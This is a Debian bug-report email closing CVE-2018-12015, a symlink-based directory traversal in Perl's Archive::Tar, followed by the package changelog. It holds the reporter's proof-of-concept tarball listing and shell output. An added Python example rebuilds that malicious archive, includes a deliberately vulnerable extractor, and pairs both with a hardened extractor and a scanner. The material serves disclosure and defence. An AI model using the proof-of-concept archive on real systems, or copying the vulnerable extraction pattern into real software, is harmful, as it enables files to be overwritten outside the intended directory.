Your message dated Tue, 26 Jun 2018 08:18:09 +0000
with message-id <e1fxjav-000hio...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.28.0-1
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
--- End Message ---
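The bypass above relies on the extractor creating the symlink, then opening the same name for writing: open(2) follows the link, so the second entry's contents land at the link's target. As an added example (not code from the bug report, from Archive::Tar, or from the Debian fix), the block below rebuilds an archive shaped like traversal.tar.gz in memory with Python's tarfile, shows a naive extractor that is defeated by it, and a hardened extractor that refuses names and link targets leaving the destination and never opens a regular file through a symlink (it replaces the link and creates the file with O_EXCL|O_NOFOLLOW). It also includes a pre-extraction scan for names that appear as a link and later as a file. All function names are this example's own; the outside path stands in for /tmp/moo and is a constructed temp directory, not a real target.

```python
"""Symlink-then-file tar traversal (the CVE-2018-12015 pattern), vulnerable and hardened."""
import io
import os
import tarfile
import tempfile


class UnsafeEntry(Exception):
    """Raised when an archive entry would write outside the destination."""


def build_poc_tar(link_target: str, include_link: bool = True) -> bytes:
    """Constructed archive: symlink 'moo' -> link_target, then a regular file 'moo'."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        if include_link:
            link = tarfile.TarInfo("moo")
            link.type = tarfile.SYMTYPE
            link.linkname = link_target
            tar.addfile(link)
        payload = b"moo\n"
        reg = tarfile.TarInfo("moo")          # type defaults to REGTYPE
        reg.size = len(payload)
        tar.addfile(reg, io.BytesIO(payload))
    return buf.getvalue()


def find_link_file_collisions(tar_bytes: bytes) -> list:
    """Pre-extraction scan: names that appear as a link and later as a non-link entry."""
    links, hits = set(), []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar:
            name = os.path.normpath(m.name)
            if m.issym() or m.islnk():
                links.add(name)
            elif name in links:
                hits.append(name)
    return hits


def naive_extract(tar_bytes: bytes, dest: str) -> None:
    """Vulnerable pattern: create the link as given, then open() the file path.
    open() follows the planted symlink, so the file is written at the link's target."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar:
            target = os.path.join(dest, m.name)
            if m.issym():
                os.symlink(m.linkname, target)
            elif m.isfile():
                with open(target, "wb") as f:     # follows the symlink: the bug
                    f.write(tar.extractfile(m).read())


def _under(dest: str, path: str) -> bool:
    return os.path.commonpath([dest, path]) == dest


def safe_extract(tar_bytes: bytes, dest: str) -> list:
    """Hardened extraction: reject escaping names and link targets, lstat every parent
    component, and never write a regular file through an existing symlink."""
    dest = os.path.realpath(dest)
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar:
            target = os.path.normpath(os.path.join(dest, m.name))
            if not _under(dest, target):
                raise UnsafeEntry(f"{m.name}: path escapes {dest}")
            parent = os.path.dirname(target)
            probe = dest
            for comp in os.path.relpath(parent, dest).split(os.sep):
                if comp in ("", "."):
                    continue
                probe = os.path.join(probe, comp)
                if os.path.islink(probe):         # a link planted earlier would redirect us
                    raise UnsafeEntry(f"{m.name}: parent {probe} is a symlink")
            os.makedirs(parent, exist_ok=True)
            if m.issym():
                link_abs = os.path.normpath(os.path.join(parent, m.linkname))
                if os.path.isabs(m.linkname) or not _under(dest, link_abs):
                    raise UnsafeEntry(f"{m.name} -> {m.linkname}: link leaves {dest}")
                if os.path.lexists(target):
                    os.unlink(target)
                os.symlink(m.linkname, target)
            elif m.isdir():
                if os.path.islink(target):
                    raise UnsafeEntry(f"{m.name}: directory path is a symlink")
                os.makedirs(target, exist_ok=True)
            elif m.isfile():
                if os.path.lexists(target):
                    os.unlink(target)             # drop link or stale file; never write through it
                flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
                with os.fdopen(os.open(target, flags, 0o644), "wb") as f:
                    f.write(tar.extractfile(m).read())
            else:
                raise UnsafeEntry(f"{m.name}: unsupported entry type")
            written.append(m.name)
    return written


def demo() -> dict:
    """Run the three scenarios in a throwaway directory and report what happened."""
    tmp = tempfile.mkdtemp()
    victim = os.path.join(tmp, "outside", "moo")  # stands in for /tmp/moo
    os.mkdir(os.path.dirname(victim))
    poc = build_poc_tar(victim)
    out = {"collisions": find_link_file_collisions(poc)}
    d = os.path.join(tmp, "naive"); os.mkdir(d)
    naive_extract(poc, d)
    out["naive_escaped"] = os.path.isfile(victim)
    os.unlink(victim)
    d = os.path.join(tmp, "safe"); os.mkdir(d)
    try:
        safe_extract(poc, d); out["safe_rejected"] = False
    except UnsafeEntry:
        out["safe_rejected"] = True
    out["safe_escaped"] = os.path.exists(victim)
    d = os.path.join(tmp, "planted"); os.mkdir(d)
    os.symlink(victim, os.path.join(d, "moo"))    # link already on disk before extraction
    safe_extract(build_poc_tar(victim, include_link=False), d)
    out["planted_escaped"] = os.path.exists(victim)
    p = os.path.join(d, "moo")
    out["planted_replaced"] = os.path.isfile(p) and not os.path.islink(p)
    return out


if __name__ == "__main__":
    print(demo())
```

The third scenario matters because rejecting out-of-tree symlinks in the archive is not enough on its own: a link may already exist in the destination, or a relative link that stays inside the tree may be followed by a same-named file. Refusing to open through a link closes both, whereas checking the archive alone does not.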
--- Begin Message ---
Source: perl
Source-Version: 5.28.0-1
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Niko Tyni <nt...@debian.org> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Mon, 25 Jun 2018 22:20:16 +0300
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.28 libperl-dev perl-modules-5.28 perl
Architecture: source
Version: 5.28.0-1
Distribution: experimental
Urgency: medium
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Niko Tyni <nt...@debian.org>
Description:
libperl-dev - Perl library: development files
libperl5.28 - shared Perl library
perl - Larry Wall's Practical Extraction and Report Language
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl-modules-5.28 - Core Perl modules
Closes: 900834
Changes:
perl (5.28.0-1) experimental; urgency=medium
.
[ Dominic Hargreaves ]
* Merge 5.26.2-6 from unstable
- [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
.
[ Niko Tyni ]
* Add an autopkgtest check that trivially embeds Perl in C.
* Import new upstream major release.
Checksums-Sha1:
4de68cb29e14d3fd4bb4df4a6bbc6c8c01671d6b 2810 perl_5.28.0-1.dsc
21339f5f1bcacbaed5cdfe97368eacbc5e55da35 411944 perl_5.28.0.orig-regen-configure.tar.xz
c0e9e7a0dea97ec9816687d865fd461a99ef185c 12410536 perl_5.28.0.orig.tar.xz
f69e2f6d929af8f8509857a8462373ababe05033 158260 perl_5.28.0-1.debian.tar.xz
66ccc15f8cdb38e2b3ad50d2e94de64cf2a6a3ae 4729 perl_5.28.0-1_source.buildinfo
Checksums-Sha256:
226d942fbe976325a81bdd7e870dd24788abdf8c13dd372624eb3522e16095be 2810 perl_5.28.0-1.dsc
5873b81af4514d3910ab1a8267b15ff8c0e2100dbae4edfd10b65ef72cd31ef8 411944 perl_5.28.0.orig-regen-configure.tar.xz
059b3cb69970d8c8c5964caced0335b4af34ac990c8e61f7e3f90cd1c2d11e49 12410536 perl_5.28.0.orig.tar.xz
a587795bbaaec31d0dbfa84b2d2f130bc47d8926823de8afb5141904df892a61 158260 perl_5.28.0-1.debian.tar.xz
c000ae91b48aeb9923ae38398ab8b2e6e8a9c4368d3b6c7bf4f77498ed3f1f29 4729 perl_5.28.0-1_source.buildinfo
Files:
7148eff8c8fbf5f8410b3ac475cd435e 2810 perl standard perl_5.28.0-1.dsc
fbf2e774fdcc55c92afe713db38e5e25 411944 perl standard perl_5.28.0.orig-regen-configure.tar.xz
f3245183c0a08f65e94a3333995af08e 12410536 perl standard perl_5.28.0.orig.tar.xz
433f0df9d2640f50ee6a801c03f11d4c 158260 perl standard perl_5.28.0-1.debian.tar.xz
d89e67cbcff53286c4ed087c4aefc229 4729 perl standard perl_5.28.0-1_source.buildinfo
--- End Message ---